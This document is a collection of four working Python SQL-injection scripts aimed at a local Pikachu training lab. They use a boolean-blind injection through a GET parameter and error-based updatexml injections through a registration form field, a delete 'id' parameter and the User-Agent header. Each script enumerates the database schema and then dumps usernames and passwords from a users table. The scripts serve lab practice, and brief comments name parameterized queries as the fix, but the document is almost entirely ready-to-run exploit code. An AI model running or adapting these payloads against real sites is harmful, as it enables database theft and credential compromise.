1.xx型注入
python
import requests
# Lab endpoint (local Pikachu instance); the injected value travels in the
# GET parameter "name" (see test_basic / is_true below).
url = "http://127.0.0.1/pikachu-master/vul/sqli/sqli_x.php"
def test_basic():
    """Send one true and one false condition and compare the response sizes.

    Returns a ``(len_true, len_false)`` tuple with the two page lengths; the
    caller decides from their difference whether the endpoint actually
    responds differently to the two conditions. Nothing else is computed —
    this only performs two GET requests and prints what came back.
    """
    print("[*] 测试正确的XX型注入闭合方式...")
    # Both values use the same closing sequence; they differ only in truth value.
    conditions = {
        "true": "') OR 1=1 #",
        "false": "') AND 1=2 #",
    }
    # GET endpoint: the parameters are carried in the query string.
    pages = {
        key: requests.get(url, params={"name": cond, "submit": "查询"}).text
        for key, cond in conditions.items()
    }
    page_true, page_false = pages["true"], pages["false"]
    print(f"[+] 真条件页面长度: {len(page_true)}")
    print(f"[-] 假条件页面长度: {len(page_false)}")
    # Show the head of each page so the difference can be checked by eye.
    print("\n[DEBUG] 真条件页面前500字符:")
    print(page_true[:500])
    print("\n[DEBUG] 假条件页面前500字符:")
    print(page_false[:500])
    return len(page_true), len(page_false)
def is_true(payload, len_true, len_false):
    """Return True when the server treats *payload* as a true condition.

    The decision is made purely on response size: a page whose length lies
    within 10 bytes of ``len_true`` counts as the "true" page. ``len_false``
    is part of the signature but is not consulted. A failed request is
    printed and reported as False.
    """
    condition = f"') OR {payload} #"
    query = {"name": condition, "submit": "查询"}
    try:
        page = requests.get(url, params=query, timeout=5).text
    except Exception as exc:
        print(f"请求错误: {exc}")
        return False
    # A 10-byte tolerance absorbs small dynamic differences between pages.
    return abs(len(page) - len_true) < 10
def dump_data(sql, len_true, len_false):
    """Recover the result of *sql* one character at a time.

    For every position a binary search over the printable ASCII range
    (32..126) is driven by is_true(). Extraction stops after 49 characters,
    when the resolved code is 32 (a space, or anything at or below it) or
    when it runs past 126 (no printable match). Progress is printed as it
    goes; the recovered string is returned.
    """
    def char_code_at(position):
        # Narrow [lo, hi] until lo is the ASCII code of the character at
        # *position*; lo ends at 32 when the code is 32 or lower and above
        # 126 when every comparison came back true.
        lo, hi = 32, 126
        while lo <= hi:
            mid = (lo + hi) // 2
            cond = f"ascii(substr(({sql}),{position},1))>{mid}"
            if is_true(cond, len_true, len_false):
                lo = mid + 1
            else:
                hi = mid - 1
        return lo

    chars = []
    print("正在提取: ", end="", flush=True)
    for position in range(1, 50):
        code = char_code_at(position)
        if code == 32 or code > 126:
            break
        chars.append(chr(code))
        print(chr(code), end="", flush=True)
    result = "".join(chars)
    print(f"\n提取结果: {result}")
    return result
if __name__ == "__main__":
    print("="*50)
    print("Pikachu XX型SQL注入 布尔盲注 最终版")
    print("="*50)
    # Step 1: confirm that the true and false conditions yield different page
    # sizes; equal lengths mean there is no boolean oracle, so stop here.
    len_true, len_false = test_basic()
    if len_true == len_false:
        exit("\n[!] 注入未生效,请检查URL和闭合方式!")
    # Step 2: walk the schema, reusing the two reference lengths as the oracle.
    # Defender's note: every query below is only answerable because the page
    # interpolates the "name" field into SQL; a parameterized query removes
    # the oracle entirely.
    print("\n[1] 提取当前数据库名...")
    db_name = dump_data("select database()", len_true, len_false)
    print(f"[+] 当前数据库: {db_name}")
    print("\n[2] 提取所有表名...")
    tables_sql = f"select group_concat(table_name) from information_schema.tables where table_schema='{db_name}'"
    tables = dump_data(tables_sql, len_true, len_false)
    print(f"[+] 所有表: {tables}")
    print("\n[3] 提取users表字段名...")
    cols_sql = f"select group_concat(column_name) from information_schema.columns where table_schema='{db_name}' and table_name='users'"
    columns = dump_data(cols_sql, len_true, len_false)
    print(f"[+] users表字段: {columns}")
    print("\n[4] 提取账号密码...")
    data_sql = "select group_concat(username,':',password) from users"
    data = dump_data(data_sql, len_true, len_false)
    print("-"*50)
    # group_concat joins rows with ','; each row is "username:password".
    for line in data.split(','):
        if ':' in line:
            user, pwd = line.split(':', 1)
            print(f"账号: {user:10s} | 密码: {pwd}")
    print("-"*50)
    print("\n[+] 脱库完成!")
2."insert/update"注入
python
import requests
import re
# ===================== Configuration =====================
# Registration endpoint of the local lab instance (POST form).
url = "http://127.0.0.1/pikachu-master/vul/sqli/sqli_iu/sqli_reg.php"
# Baseline form body; get_part() copies it and overwrites "username" per
# request, every other field is filler that keeps the form valid.
post_data = {
    "username": "",
    "password": "123456",
    "sex": "boy",
    "phonenum": "11111111111",
    "email": "test@qq.com",
    "address": "test",
    "submit": "submit"
}
# ==================================================
def get_part(sql, start, length):
    """Read *length* characters of the result of *sql* starting at *start*.

    The chunk is reflected back inside the server's XPATH error message
    (updatexml's output is capped at 32 characters, hence the chunking).
    Returns the captured text, or "" when nothing matched or the request
    failed (the failure is printed).
    """
    form = dict(post_data)
    form["username"] = (
        f"' OR updatexml(1,concat(0x7e,substr(({sql}),{start},{length})),1) OR '"
    )
    try:
        body = requests.post(url, data=form, timeout=3).text
    except Exception as exc:
        print(f"请求错误: {exc}")
        return ""
    # Everything between the leading '~' marker and the closing quote.
    found = re.search(r"XPATH syntax error: '~([^~]+)'", body)
    return found.group(1) if found else ""
def get_full(sql, step=20):
    """Concatenate successive *step*-sized chunks of the result of *sql*.

    Stops at the first empty chunk, or as soon as the next offset would pass
    200 (a cap that guards against an endless loop). Returns the assembled
    string.
    """
    chunks = []
    offset = 1
    while offset <= 200:
        piece = get_part(sql, offset, step)
        if not piece:
            break
        chunks.append(piece)
        offset += step
    return "".join(chunks)
# ===================== Extraction =====================
# Each get_full() call reads one value through the error-message channel.
# Defender's note: this works only because the page interpolates the form
# field into SQL and echoes the raw database error; parameterized queries
# or a generic error page close the channel.
print("=" * 65)
print("🔥 PIKACHU INSERT/UPDATE 注入 ")
print("=" * 65)
print("[✅] 数据库名: ", end="")
db_name = get_full("select database()")
print(db_name)
print("[✅] 所有表名: ", end="")
tables = get_full("select group_concat(table_name) from information_schema.tables where table_schema=database()")
print(tables)
print("[✅] users 表字段: ", end="")
columns = get_full("select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'")
print(columns)
print("[✅] 账号密码: ", end="")
account_data = get_full("select group_concat(concat(username,':',password)) from users")
print(account_data)
print("=" * 65)
print("\n🎉 脱库完成!")
3."delete"注入
python
import requests
import re
# ===================== DELETE variant (same logic as the INSERT script) =====================
# Delete endpoint of the local lab instance; the injected value is the "id"
# query parameter.
url = "http://127.0.0.1/pikachu-master/vul/sqli/sqli_del.php"
# 完全模仿你能用的 INSERT 脚本!!!
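def get_part(sql, start, length):
    """Read *length* characters of the result of *sql* starting at *start*.

    The "id" value is appended to the URL by string formatting rather than
    via ``params=`` — the author's stated reason is to keep the trailing
    ``--+`` exactly as written. The chunk comes back inside the server's
    XPATH error message. Returns "" when nothing matched or the request
    failed.
    """
    payload = f"1 OR updatexml(1,concat(0x7e,substr(({sql}),{start},{length})),1) --+"
    try:
        body = requests.get(f"{url}?id={payload}", timeout=3).text
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt / SystemExit
        # still stop the extraction loop instead of being swallowed as "".
        return ""
    found = re.search(r"XPATH syntax error: '~([^~]+)'", body)
    return found.group(1) if found else ""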
def get_full(sql, step=20):
    """Concatenate successive *step*-sized chunks of the result of *sql*.

    Stops at the first empty chunk, or as soon as the next offset would pass
    200 (a cap that guards against an endless loop). Returns the assembled
    string.
    """
    chunks = []
    offset = 1
    while offset <= 200:
        piece = get_part(sql, offset, step)
        if not piece:
            break
        chunks.append(piece)
        offset += step
    return "".join(chunks)
# ===================== Extraction =====================
# Each get_full() call reads one value through the error-message channel.
# Defender's note: the "id" parameter is concatenated into SQL and the raw
# database error is echoed; parameterized queries (or not rendering DB
# errors) close the channel.
print("=" * 65)
print("🔥 PIKACHU DELETE 注入 ")
print("=" * 65)
print("[✅] 数据库名: ", end="")
# No leading "select" here, unlike the other scripts; the expression is
# wrapped in parentheses inside substr() either way.
db_name = get_full("database()")
print(db_name)
print("[✅] 所有表名: ", end="")
tables = get_full("select group_concat(table_name) from information_schema.tables where table_schema=database()")
print(tables)
print("[✅] users 表字段: ", end="")
columns = get_full(
    "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'")
print(columns)
print("[✅] 账号密码: ", end="")
account_data = get_full("select group_concat(concat(username,':',password)) from users")
print(account_data)
print("=" * 65)
4."http header"注入
python
import requests
import re
# ===================== Configuration (HTTP header variant) =====================
# Login endpoint of the local lab instance (POST form).
url = "http://127.0.0.1/pikachu-master/vul/sqli/sqli_header/sqli_header_login.php"
# Fixed form body; the values do not matter for this exercise because the
# injected value is sent in the User-Agent header (see get_part).
post_data = {
    "username": "admin",
    "password": "123456",
    "submit": "submit"
}
# ==================================================
def get_part(sql, start, length):
    """Read *length* characters of the result of *sql* starting at *start*.

    The value is carried in the User-Agent header while the form body stays
    the fixed post_data. The chunk comes back inside the server's XPATH
    error message (updatexml's output is capped at 32 characters, hence the
    chunking). Returns "" when nothing matched or the request failed (the
    failure is printed).
    """
    probe = f"' OR updatexml(1,concat(0x7e,substr(({sql}),{start},{length})),1) OR '"
    request_headers = {
        "User-Agent": probe,
        "Content-Type": "application/x-www-form-urlencoded",
    }
    try:
        body = requests.post(
            url, data=post_data, headers=request_headers, timeout=3
        ).text
    except Exception as exc:
        print(f"请求错误: {exc}")
        return ""
    # Everything between the leading '~' marker and the closing quote.
    found = re.search(r"XPATH syntax error: '~([^~]+)'", body)
    return found.group(1) if found else ""
def get_full(sql, step=20):
    """Concatenate successive *step*-sized chunks of the result of *sql*.

    Stops at the first empty chunk, or as soon as the next offset would pass
    200 (a cap that guards against an endless loop). Returns the assembled
    string.
    """
    chunks = []
    offset = 1
    while offset <= 200:
        piece = get_part(sql, offset, step)
        if not piece:
            break
        chunks.append(piece)
        offset += step
    return "".join(chunks)
# ===================== Extraction =====================
# Each get_full() call reads one value through the error-message channel.
# Defender's note: request headers such as User-Agent are attacker-controlled
# input like any other; the fix is the same as for form fields —
# parameterized queries and no raw database errors in the response.
print("=" * 65)
print("🔥 PIKACHU HTTP Header 注入 ")
print("=" * 65)
print("[✅] 数据库名: ", end="")
db_name = get_full("select database()")
print(db_name)
print("[✅] 所有表名: ", end="")
tables = get_full("select group_concat(table_name) from information_schema.tables where table_schema=database()")
print(tables)
print("[✅] users 表字段: ", end="")
columns = get_full("select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'")
print(columns)
print("[✅] 账号密码: ", end="")
account_data = get_full("select group_concat(concat(username,':',password)) from users")
print(account_data)
print("=" * 65)
print("\n🎉 HTTP Header注入脱库完成!")